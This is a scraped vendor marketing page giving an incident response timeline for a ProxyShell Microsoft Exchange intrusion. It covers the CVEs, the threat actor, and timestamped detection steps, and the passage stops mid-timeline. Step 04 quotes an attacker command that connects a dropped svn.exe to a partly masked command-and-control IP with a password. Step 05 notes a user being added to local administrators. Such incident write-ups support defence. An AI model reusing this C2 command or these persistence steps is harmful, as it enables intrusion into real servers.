Incident Response Timeline – Microsoft Exchange Vulnerability

Microsoft Exchange Vulnerability

Incident Response Timeline TIME From Detection
to Escalation: 20 MINUTES

Join us for our latest real-world attack example which will walk through an attack on a customer in the construction industry with the attacker leveraging the Microsoft Exchange vulnerabilities that were released in early 2021. We’ll show you step by step how the Arctic Wolf team was able to help this customer both stop the immediate attack as well as build a long term fix for these vulnerabilities.

Adversary (Attacker)

aw-timeline-platform-icon_w-210706.png

Arctic Wolf's Platform

aw-timeline-triage-icon-210706.png

Arctic Wolf Triage Team

aw-timeline-customer-icon_w-210706.png

Arctic Wolf Customer

aw-timeline-cst-icon_w-210706.png

Arctic Wolf Concierge Security Team

ATTACKER'S 5-MONTH WINDOW

  • March 2021

    Microsoft releases out-of-band patch to address multiple critical vulnerabilities within Microsoft Exchange

  • April 2021

    Microsoft releases security updates for a second set of RCE vulnerabilities within Microsoft Exchange

  • May - July 2021

    These collections of vulnerabilities are dubbed ProxyShell. Bad actors leverage three separate vulnerabilities as part of a single attack to bypass authentication and execute code

  • August 2nd, 2021

    Customer completes onboarding with Arctic Wolf

On Tuesday, March 2, 2021, one week ahead of its typical Patch Tuesday release, Microsoft released an out-of-band patch to address

What do these vulnerabilities mean?

These
Vulnerabilities include: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.
vulnerabilities allowed attackers to take full control of a Microsoft Exchange Server exposed to the public internet. Microsoft reported that these vulnerabilities were being actively exploited by HAFNIUM, a threat group they describe as state-sponsored and operating out of China, with attacks dating back to at least January 6, 2021.

View Detailed Attack Timeline

Mon., Aug. 2

5:00pm

Sat., Aug. 7

7:27pm

7:29-7:47pm

7:50pm

8:08pm

8:09pm

Mon., Aug. 9

9:00am

01

SOURCE:

Customer Onboarding Monday, August 2nd

[Customer] completes onboarding with Arctic Wolf 5 days prior with Service Delivery kicking off on Monday, August 2, 2021.
  • 1:16pm

02

Source:

Arctic Wolf Agent Saturday, August 7 | 7:27pm

The Arctic Wolf Agent observes
PowerShell Empire is an incredibly powerful post-exploitation tool. It provides capabilities including privilege escalation, lateral movement, credential theft, and more.
PowerShell enumeration commands on [Exchange Server] begins investigation into [User1] activity.
  • 7:27pm


TIME TO DETECTION: Less than 2 minutes


03

Arctic Wolf Triage Team:

Investigation Begins Saturday, August 7 | 7:29pm - 7:47pm

The Arctic Wolf Triage Team begins investigation and confirms enumeration commands are suspicious, possible
Used to target enterprise environments, Ryuk ransomware typically encrypts files on an infected system and holds them ransom for cryptocurrency.
Ryuk.
Triage Team creates ticket and contacts [customer].
  • 7:29pm

04

Monitoring CONTINUES:

Arctic Wolf Platform Saturday, August 7 | 7:50pm

Source: Arctic Wolf Agent

  • SVN.exe is TortoiseSVN, a subversion client that can be used to add, remove, or modify files in a directory.
    SVN.exe dropped to [Exchange Server]
  • PowerShell Command “svn.exe–connect 135.181.x.x:443 –Pass Pasword123”

Log Source: Arctic Wolf Sensor

  • IP 135.181.x.x associated with C2 server in Finland
  • 7:50pm

05

Source:

Arctic Wolf Agent Saturday, August 7 | 8:08pm

[User1] added to [Exchange Server] local Administrators Group.
Credentials to local [Admin] account were reset.
  • 8:08pm


Less than a
minute later